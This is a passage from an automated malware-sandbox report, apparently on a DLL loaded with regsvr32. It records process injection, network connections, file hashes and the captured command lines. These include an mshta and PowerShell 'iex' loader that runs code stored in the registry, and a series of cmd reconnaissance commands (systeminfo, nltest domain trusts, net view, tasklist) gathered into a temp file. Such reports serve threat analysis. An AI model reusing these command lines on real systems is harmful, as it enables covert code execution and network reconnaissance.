N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3256 wrote to memory of 4540 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3256 wrote to memory of 4540 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3256 wrote to memory of 4540 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2952 wrote to memory of 4380 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 4380 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4380 wrote to memory of 864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4380 wrote to memory of 864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 864 wrote to memory of 3588 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 864 wrote to memory of 3588 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4380 wrote to memory of 3228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4380 wrote to memory of 3228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3228 wrote to memory of 4068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3228 wrote to memory of 4068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4244 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4244 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4244 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4244 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4244 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4244 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 4344 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4344 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4208 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4208 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4208 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4208 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3116 wrote to memory of 1092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 1092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 832 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 832 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 832 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3116 wrote to memory of 4600 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4600 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 556 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 556 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 556 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 556 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3116 wrote to memory of 5052 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 5052 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4296 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4296 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4296 wrote to memory of 3224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lp3h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lp3h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name muwvla -value gp; new-alias -name pimbks -value iex; pimbks ([System.Text.Encoding]::ASCII.GetString((muwvla "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES256A.tmp" "c:\Users\Admin\AppData\Local\Temp\xr5mce2s\CSC1396718FD4E48259285D1476762AD99.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2683.tmp" "c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\343A.bin1 > C:\Users\Admin\AppData\Local\Temp\343A.bin & del C:\Users\Admin\AppData\Local\Temp\343A.bin1"

Network

Country Destination Domain Proto
US 8.238.21.254:80 tcp
US 8.238.21.254:80 tcp
US 8.238.21.254:80 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
FR 2.18.109.224:443 tcp
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp
RO 37.120.206.71:80 37.120.206.71 tcp
US 8.8.8.8:53 164.2.77.40.in-addr.arpa udp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
US 8.8.8.8:53 9.9.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.3.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa udp

Files

memory/4540-130-0x0000000000000000-mapping.dmp

memory/4540-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/4540-136-0x0000000000BE0000-0x0000000000BED000-memory.dmp

memory/4380-140-0x0000000000000000-mapping.dmp

memory/4380-141-0x000001F2D6B20000-0x000001F2D6B42000-memory.dmp

memory/4380-142-0x00007FF8D9E80000-0x00007FF8DA941000-memory.dmp

memory/864-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.cmdline

MD5 e2bc0cd94a1905450fe7c4665accfbe0
SHA1 5a71da3c6bea5105bb934594b7f0bf41f31bd30f
SHA256 5b67365b0f494a631fcd9560ff30c6e793cec9ad9553762c9c5761e998aa94c9
SHA512 759d5cd8f05fac682d45f5ed8141bd2a4a441d5b4cf2f09afed20cb3f6d9a7fdbff3e628307cceaa47ef124a499d9f3d616130bd3354d238b0d7b9b66dca7a26

\??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3588-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\CSC1396718FD4E48259285D1476762AD99.TMP

MD5 76bd946bba0aaa6c3953f08a7a52873c
SHA1 de1d778b2548b3a67fc6b430ca286a5ae07d3020
SHA256 0c535950015294e9f36f037b13c76d45f7aa6cf7319b52718c4323e7b5d55641
SHA512 0ce5d8ef4686b7273301cdfcc2229a0bcd00a996d3172e3c4032de042f4fad6b9d76515dcf7ad74236d7e248fdf9c043d39b776551db7ad3515a0613884c9787

C:\Users\Admin\AppData\Local\Temp\RES256A.tmp

MD5 c61bb66419dd65cf5ad9f747f26d4db4
SHA1 1837614b7a0b5f461fe28b2ba755e535a21c2996
SHA256 f3f58e80271e86370440a5851d1b4edea44b5eea4a4e758452bee2f850bbb0ae
SHA512 af87507594158784b4bdcb549b50376120e5b8e4e756267752bd6b3750ba773424bec60870058becfe74ec13fa38043ee26846afe90944b018b538b9dfe268b3

C:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.dll

MD5 bcb55518005d3f22cc8b6f9c1f9462b1
SHA1 b853cc5e1f68fa59e272197923c92cd2e2e69405
SHA256 e3b73c85f38115f41b56be783d4452b0932c026b535cefd6562d8737c190cba9
SHA512 5732aa781fe02d9e2f09a50d962a0a932d325ea3fc86f31cdfe6a937ac1bb88bb5c364142f849d7e6b82db7e2ed520b1bf9f81d6887407c7fd5f9f4d8215bc32

memory/3228-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline

MD5 beba16e59f02318fd5747b8d7be8ec2f
SHA1 5c9a49f37d0f4e296364c45358c9e51be664e9cc
SHA256 ed4a7645909f7cda9edce8a4f3d75bdde28f2ab0e314c71390207c00918c1271
SHA512 f65cdbd3ba37ff1860bc5531ff815a2859b93c52a64b47e7215d3926b3fbedbbbf3077efbab028dbcefb52cc6da85d3097b293c714893635d280fb0a7834fd9e

\??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/4068-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP

MD5 c1acc698bdec8241f5b0e61fa805b79c
SHA1 4cc0b5f5f6413d4ccca23fd8584239ffac44b881
SHA256 eae014f0f50d027fbf549bc41ce9e0c674488c1c8fee8120034e6343807dff60
SHA512 3448bfdc44384fecc3fe056c3e9b79d76eb52605634414a2a2327eed62056416687e341e075a3ed7334d666edb2c990835aa2641c7a07978ebf83d0fc9b5b53c

C:\Users\Admin\AppData\Local\Temp\RES2683.tmp

MD5 4c9e24c8ad5b4da6b1ffc13bce37b3c7
SHA1 71e51eb055b3a43666eba00d6f16d67534ee6c77
SHA256 b9682cfee63e97bbef9a43d5029d79b8e69c4a1667b48e852ffe9d3778167175
SHA512 69b2885d5ab9258310ee707de32d57e5ffe962ead72df23732ad532048437bf4972faa0148176970b60a5d86027add8f253dd610203d86b19aa1dedacb9e0df0

C:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.dll

MD5 f39620c5773a3b2aa5d5befdd2c31124
SHA1 0aeab41edec2c360b2438dcdf95e3830a9149aef
SHA256 be17263265fd35655c213e23f29959df22b6d5357b54c435b66a9047459c9322
SHA512 ff6e19217b79b841da43888b40b8df924c889c04311a3b20176417a2e0dfe6f8709ac242eeb0f9044f5cc87218233663b55c1fa619d384e3f1bc0f309c1a31c3

memory/4380-157-0x00007FF8D9E80000-0x00007FF8DA941000-memory.dmp

memory/4380-158-0x000001F2D6D00000-0x000001F2D6D3D000-memory.dmp

memory/3576-159-0x00000183FD920000-0x00000183FD9C3000-memory.dmp

memory/3116-160-0x0000000008120000-0x00000000081C3000-memory.dmp

memory/4244-161-0x0000000000000000-mapping.dmp

memory/1740-162-0x0000000000000000-mapping.dmp

memory/4188-163-0x0000000000000000-mapping.dmp

memory/2148-164-0x0000000000000000-mapping.dmp

memory/1740-165-0x0000000000786B20-0x0000000000786B24-memory.dmp

memory/1740-166-0x0000000000C70000-0x0000000000D06000-memory.dmp

memory/4344-167-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/4208-169-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3816-171-0x0000000000000000-mapping.dmp

memory/3828-172-0x0000017AAEB30000-0x0000017AAEBD3000-memory.dmp

memory/4552-173-0x000001BCBF400000-0x000001BCBF4A3000-memory.dmp

memory/3116-174-0x000000000D260000-0x000000000D39B000-memory.dmp

memory/3116-178-0x000000000D3A0000-0x000000000D4DA000-memory.dmp

memory/1092-182-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 92f52356fda8a51244df2c14828bd930
SHA1 335bedf66b420029da09eca8d9ed22cae93fdd64
SHA256 ba0aeb1efb309fe38822f7bb479a4ba9e8558b6a02a4129a21a9a960b81f0b69
SHA512 dbe7d8d2c0779995437e8c51e7b431593aa2678450da30b9cc97e527e2142f585d486b2c3056b210e4e2c84bd2a1d03588089a189ff29150b20b99c17744ad79

memory/832-184-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 7266e6c1b7501456d74c5ac4bcaf2352
SHA1 1aee2a2a73cb5371e126e907eeed12f2ce11e0a3
SHA256 dc0fb0044edd0389e9993b3c925f55309a38653131bf53fcb18dc9d93d8d6ac1
SHA512 4dc00e2a88e1b483ddc879e6da6adee83890f3691cd9842bfaf8d48eec0171361f2adccc24773bc2cabe58f9e70debdffc0730043be073c18d9ff9e4a2fb5f7b

memory/2152-186-0x0000000000000000-mapping.dmp

memory/3116-187-0x0000000008120000-0x00000000081C3000-memory.dmp

memory/4600-188-0x0000000000000000-mapping.dmp

memory/556-189-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 837de7e11db720fff66b7f7181271c0f
SHA1 856a8ae5bde24ce4b8f0c27b62222e355165c4b8
SHA256 249ec97ae002bdfea9b65ba8e1e0644db23ba5e0a2f312659446ac53c71bb852
SHA512 17ea0edf2b4342310c28e097eaf4a4df31bee807d2a75c196d5f299a060dfa17e152e6f03cc23262fdea3e413bc12412dab62cd563b16d1210dc9e07b7f6e04e

memory/2708-191-0x0000000000000000-mapping.dmp

memory/5052-192-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 a270d63c9c2ce75338beadd46651e418
SHA1 78d67614545c3bfa349fb671d45a0cce2ae134b7
SHA256 1a606937fdabcc8d148b3319e8f515f0d204e0d4380045daf93f55967b3cfebc
SHA512 e44bb6aedc4fa8c87e1d654ae0aaf33618a5867c99dfaa8f40a64c6217bdbe554faa6aa804785aa706cf40f19f9291feb2af40ab283c6990da1d7b8c64a5de99

memory/4296-194-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 a270d63c9c2ce75338beadd46651e418
SHA1 78d67614545c3bfa349fb671d45a0cce2ae134b7
SHA256 1a606937fdabcc8d148b3319e8f515f0d204e0d4380045daf93f55967b3cfebc
SHA512 e44bb6aedc4fa8c87e1d654ae0aaf33618a5867c99dfaa8f40a64c6217bdbe554faa6aa804785aa706cf40f19f9291feb2af40ab283c6990da1d7b8c64a5de99

memory/3224-196-0x0000000000000000-mapping.dmp

memory/2916-197-0x0000000000000000-mapping.dmp

